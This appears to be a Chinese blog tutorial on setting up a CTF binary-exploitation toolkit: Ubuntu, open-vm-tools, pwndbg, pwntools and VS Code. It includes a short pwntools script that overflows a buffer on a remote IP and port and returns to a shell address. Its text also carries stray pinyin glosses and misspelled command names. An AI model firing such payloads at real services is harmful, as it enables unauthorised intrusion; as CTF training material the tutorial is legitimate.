欲想善其事必先利其器，無論是網(wǎng)絡安全何種方向，都有自己經(jīng)常用的工具環(huán)境，那么PWN也一樣，擁有一個完善的工具環(huán)境，可以節(jié)約我們很多事，也不會在關鍵時候因為外在條件而卡殼，可謂逢山開山，逢水架橋，成為一個牛逼pwn手。

系統(tǒng)選擇

系統(tǒng)選擇肯定是Ubuntu了，毫無疑問，直接去linux官網(wǎng)下載，版本可選擇近幾年的，不要太老：

VMware Tools

安裝虛擬機，那么VMware Tools是必不可少的，但是Vmware帶的閉源版本不好裝，而官方文檔，也給出這一點：

所以我們選擇安裝Open-VM-Tools：

命令：sudo apt install open-vm-tools

?sudo apt install open-vm-tools-desktop

隨后重啟，在登錄界面選擇選xorg，wayland沒有剪貼板同步和文件拖拽，現(xiàn)在就可以實現(xiàn)和主機交互：

pwndbg

pwndbg是gdb一個插件，專門用來調(diào)試pwn題，新增如下功能：

命令

arena

bins

Heapbase

heapinfo

Parseheap

tracemalloc

cylic

reabse

stack

retaddr

canary

got

plt

Hexdump

安裝命令：

apt install git

git clone?https://github.com/pwndbg/pwndbg

隨后進入pwndbg目錄，運行setup.sh，開始安裝：

安裝成功之后，我們在終端輸入gdb，顯示pwndbg，就證明安裝成功：

pwntools

pwntools是python的一個庫，經(jīng)常用來寫腳本，安裝命令如下：

apt install python3-pip

pip install pwntools

使用示例：

from pwn import *
io =remote('61.147.171.105',63315)
bin_sh = 0x400762
My_payload = (b'a'*0xA8+p64(bin_sh))
io.sendline(My_payload)
io.interactive()

Visual Studio Code

編寫腳本建議使用Visual Studio Code，直接在商店中安裝，在擴展搜索chinese，進行漢化：